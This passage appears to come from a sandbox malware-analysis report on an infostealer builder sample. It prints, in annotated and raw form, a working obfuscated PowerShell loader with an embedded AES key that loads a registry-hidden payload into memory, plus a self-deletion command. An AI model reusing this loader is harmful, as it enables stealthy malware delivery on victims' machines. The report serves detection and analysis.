            - Checks computer location settings
            - Deletes itself
            - Executes dropped EXE
            - Drops file in System32 directory
            - Suspicious use of SetThreadContext
            - Drops file in Windows directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            C:\Windows\$sxr-powershell.exe
                (The copy of the PowerShell host that PID 1748 dropped into C:\Windows. Same three helpers as stage 1 under new names and with a second key/IV; the difference is that the payload now comes from a registry value whose hive, sub-key path and value name are themselves AES-encrypted string literals decrypted at run time, so nothing in the clear names the persistence location. Reflowed one statement per line; the roles noted for the decrypted strings are inferred from how each is used, their plaintexts are not in the report.)
                "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command
                # GwNqo: AES-CBC decrypt with the stage-2 key/IV.
                # 'rotpyrceDetaerC'[-1..-15] resolves to CreateDecryptor; 'kcolBlaniFmrofsnarT'[-1..-19] resolves to TransformFinalBlock
                function GwNqo($hcWdd){
                    $GbeQA=[System.Security.Cryptography.Aes]::Create();
                    $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC;
                    $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
                    $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');
                    $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');
                    $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();
                    $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length);
                    $Gzcae.Dispose(); $GbeQA.Dispose();
                    $xZCEn;
                }
                # KdelZ: gunzip.
                function KdelZ($hcWdd){
                    $xreea=New-Object System.IO.MemoryStream(,$hcWdd);
                    $tUOxo=New-Object System.IO.MemoryStream;
                    $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress);
                    $AlcuH.CopyTo($tUOxo);
                    $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose();
                    $tUOxo.ToArray();
                }
                # XnBtD: in-process Assembly.Load plus EntryPoint.Invoke.
                function XnBtD($hcWdd,$vCKUl){
                    $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd);
                    $EYBYD=$UUjhO.EntryPoint;
                    $EYBYD.Invoke($null, $vCKUl);
                }
                # String table: each literal is base64 -> AES (same key/IV) -> UTF-8.
                # '8FTU'[-1..-4] resolves to UTF8; 'gnirtSteG'[-1..-9] resolves to GetString
                $GbeQA1 = New-Object System.Security.Cryptography.AesManaged;
                $GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;
                $GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
                $GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');
                $GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');
                $rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();
                # $uQajJ: registry sub-key path (argument of the open-sub-key call below)
                $uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');
                $uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);
                $uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);
                # $ZldVv: registry value name
                $ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');
                $ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);
                $ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);
                # $QHSJO: the single argument handed to the final payload's entry point
                $QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');
                $QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);
                $QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);
                # $qPAwu: a PowerShell expression, later piped to IEX, that yields the type used to load the payload
                $qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');
                $qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);
                $qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);
                # $EAKnT: decrypted but not referenced again in this command line
                $EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');
                $EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);
                $EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);
                # $iskZf: name of the get-value method called on the opened key
                $iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');
                $iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);
                $iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);
                # $Vsxgi: name of the open-sub-key method called on the hive
                $Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');
                $Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);
                $Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);
                # $GZsVo: static hive property of [Microsoft.Win32.Registry]
                $GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');
                $GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);
                $GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);
                # $VYaHm: stream method used in place of CopyTo below
                $VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');
                $VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);
                $VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);
                # $uQajJ0: method called on the entry-point MethodInfo (Invoke analogue)
                $uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');
                $uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);
                $uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);
                # $uQajJ1: CompressionMode member name
                $uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');
                $uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);
                $uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);
                # $uQajJ2: static method on the type from $qPAwu that takes the payload bytes (Load analogue)
                $uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');
                $uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);
                $uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);
                # $uQajJ3: process name for the single-instance check
                $uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');
                $uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);
                $uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);
                $rwFhy.Dispose(); $GbeQA1.Dispose();
                # Single-instance guard: quit if more than one process with the decrypted name is already running.
                if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};
                # Payload source: <hive>.<open-sub-key>(<path>).<get-value>(<name>), then split on '\' exactly like the stage-1 carrier.
                $cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);
                $eimmm=[string[]]$cqpVt.Split('\');
                # Half [1]: decrypt, gunzip, load and run, with a literal '%*' plus the same two strings stage 1 passed.
                $preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));
                XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
                # Half [0]: the same pipeline written out inline, with the method names taken from the string table instead of reversed literals.
                $UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);
                $GbeQA = New-Object System.Security.Cryptography.AesManaged;
                $GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;
                $GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
                $GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');
                $GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');
                $Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();
                $UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);
                $Gzcae.Dispose(); $GbeQA.Dispose();
                $xreea = New-Object System.IO.MemoryStream(, $UcUdn);
                $tUOxo = New-Object System.IO.MemoryStream;
                $AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);
                $AlcuH.$VYaHm($tUOxo);
                $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose();
                $UcUdn = $tUOxo.ToArray();
                # The decrypted expression is evaluated to obtain the loader type, then the payload is loaded and its entry point invoked.
                $HWqkc = $qPAwu | IEX;
                $UUjhO = $HWqkc::$uQajJ2($UcUdn);
                $EYBYD = $UUjhO.EntryPoint;
                $EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))
                (Entry truncated in the report.)
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(820).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = 
$rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = 
[Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3484
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4692
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Kills process with taskkill
PID:3240
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Views/modifies file attributes
PID:4488
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3736
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:436
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4332
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2696
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3360
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1960
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3948
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3456
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:3940
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts (2)
Hidden Files and Directories (1)
Hidden Window (1)
Downloads